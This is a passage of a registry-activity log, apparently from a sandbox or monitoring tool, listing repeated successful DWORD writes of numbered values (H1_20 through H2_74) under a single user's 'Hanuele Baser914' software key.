5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_20 Dword 748657056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_21 Dword 1153589923 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_21 Dword -1576146497 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_21 Dword -1559323479 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_21 Dword -1576142104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_22 Dword -2018110615 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_22 Dword 394021747 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_22 Dword 377436785 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_22 Dword 394026032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_23 Dword 1187944481 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_23 Dword -1930778175 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_23 Dword -1914053831 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_23 Dword -1930773128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_24 Dword 1025218457 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_24 Dword 39389817 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_24 Dword 56260737 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_24 Dword 39395008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_25 Dword 1278601822 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_25 Dword 2009569192 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_25 Dword 1992615497 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_25 Dword 2009563144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_26 Dword -1541014263 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_26 Dword -315231604 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_26 Dword -331970799 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_26 Dword -315236016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_27 Dword -405014323 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_27 Dword 1654937939 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_27 Dword 1671898329 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_27 Dword 1654932120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_28 Dword -91346770 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_28 Dword -669860834 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_28 Dword -653146719 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_28 Dword -669867040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_29 Dword 656727418 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_29 Dword 1300306352 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_29 Dword 1283613545 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_29 Dword 1300301096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_30 Dword -1112535258 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_30 Dword -1024506262 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_30 Dword -1007943631 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_30 Dword -1024498064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_31 Dword 1702991329 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_31 Dword 945674352 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_31 Dword 962503161 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_31 Dword 945670072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_32 Dword -985503911 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_32 Dword -1379127288 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_32 Dword -1395699903 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_32 Dword -1379129088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_33 Dword -479809530 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_33 Dword 591041644 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_33 Dword 574221321 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_33 Dword 591039048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_34 Dword -1695577122 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_34 Dword -1733758818 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_34 Dword -1716810287 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_34 Dword -1733760112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_35 Dword 1332200577 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_35 Dword 236411555 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_35 Dword 252979865 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_35 Dword 236408024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_36 Dword -1779661191 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_36 Dword -2088388757 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_36 Dword -2105096095 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_36 Dword -2088391136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_37 Dword 1033578814 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_37 Dword -118219836 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_37 Dword -101226199 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_37 Dword -118223000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_38 Dword -74782998 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_38 Dword 1851943293 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_38 Dword 1868633841 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_38 Dword 1851945136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_39 Dword 426438076 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_39 Dword -472845616 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_39 Dword -489441351 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_39 Dword -472854024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_40 Dword 778235267 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_40 Dword 1497313150 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_40 Dword 1480348929 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_40 Dword 1497314112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_41 Dword 850492625 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_41 Dword -827489869 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_41 Dword -810618167 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_41 Dword -827485048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_42 Dword 430530030 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_42 Dword 1142680624 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_42 Dword 1159238545 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_42 Dword 1142683088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_43 Dword 1027686222 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_43 Dword -1182118352 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_43 Dword -1198968487 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_43 Dword -1182116072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_44 Dword 1796983356 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_44 Dword 788049050 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_44 Dword 805035553 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_44 Dword 788052064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_45 Dword -1361468174 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_45 Dword -1536706224 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_45 Dword -1520140311 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_45 Dword -1536747096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_46 Dword -506355122 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_46 Dword 433417009 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_46 Dword 416685233 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_46 Dword 433421040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_47 Dword -1065245585 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_47 Dword -1891385020 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_47 Dword -1908360583 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_47 Dword -1891378120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_48 Dword -1130207794 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_48 Dword 78785446 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_48 Dword 95509441 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_48 Dword 78790016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_49 Dword 1500900243 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_49 Dword 2048953680 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_49 Dword 2065954953 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_49 Dword 2048958152 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_50 Dword 942174559 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_50 Dword -275834777 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_50 Dword -292788655 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_50 Dword -275841008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_51 Dword 235031193 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_51 Dword 1694333445 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_51 Dword 1711146777 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_51 Dword 1694327128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_52 Dword 576989428 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_52 Dword -630465644 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_52 Dword -613899039 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_52 Dword -630472032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_53 Dword 1264125873 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_53 Dword 1339701010 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_53 Dword 1322861993 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_53 Dword 1339696104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_54 Dword 1101325415 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_54 Dword -985098236 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_54 Dword -1001659535 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_54 Dword -985103056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_55 Dword -1959354571 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_55 Dword 985067920 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_55 Dword 1001750585 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_55 Dword 985065080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_56 Dword 2051258383 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_56 Dword -1339731872 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_56 Dword -1322901119 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_56 Dword -1339734080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_57 Dword -217015 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_57 Dword 630439058 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_57 Dword 613470025 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_57 Dword 630434056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_58 Dword -365989371 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_58 Dword -1694360839 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_58 Dword -1711182831 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_58 Dword -1694365104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_59 Dword -2112601407 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_59 Dword 275806448 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_59 Dword 292752857 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_59 Dword 275803032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_60 Dword -1941315164 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_60 Dword -2048994042 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_60 Dword -2065847647 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_60 Dword -2048996128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_61 Dword 1212423402 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_61 Dword -78826408 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_61 Dword -95532951 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_61 Dword -78827992 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_62 Dword 342665001 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_62 Dword 1891343900 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_62 Dword 1907943729 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_62 Dword 1891340144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_63 Dword 1910808318 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_63 Dword -433462109 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_63 Dword -416639239 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_63 Dword -433459016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_64 Dword -1103072423 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_64 Dword 1536707321 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_64 Dword 1520120897 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_64 Dword 1536709120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_65 Dword -1927373295 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_65 Dword -788094235 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_65 Dword -804924151 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_65 Dword -788090040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_66 Dword -2068123437 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_66 Dword 1182074806 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_66 Dword 1198944977 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_66 Dword 1182078096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_67 Dword 575539082 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_67 Dword -1142723000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_67 Dword -1159720039 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_67 Dword -1142721064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_68 Dword -720520074 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_68 Dword 827443146 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_68 Dword 810725729 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_68 Dword 827447072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_69 Dword 593272113 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_69 Dword -1497355200 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_69 Dword -1480368599 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_69 Dword -1497352088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_70 Dword 523564516 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_70 Dword 472812683 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_70 Dword 489553905 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_70 Dword 472816048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_71 Dword -210365652 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_71 Dword -1851989543 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_71 Dword -1868587847 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_71 Dword -1851983112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_72 Dword -80539111 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_72 Dword 118181424 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_72 Dword 101202433 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_72 Dword 118185024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_73 Dword 1580322509 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_73 Dword 2088347220 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_73 Dword 2105203657 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_73 Dword 2088353160 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_74 Dword 1463877761 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_74 Dword -236453019 success or wait 1
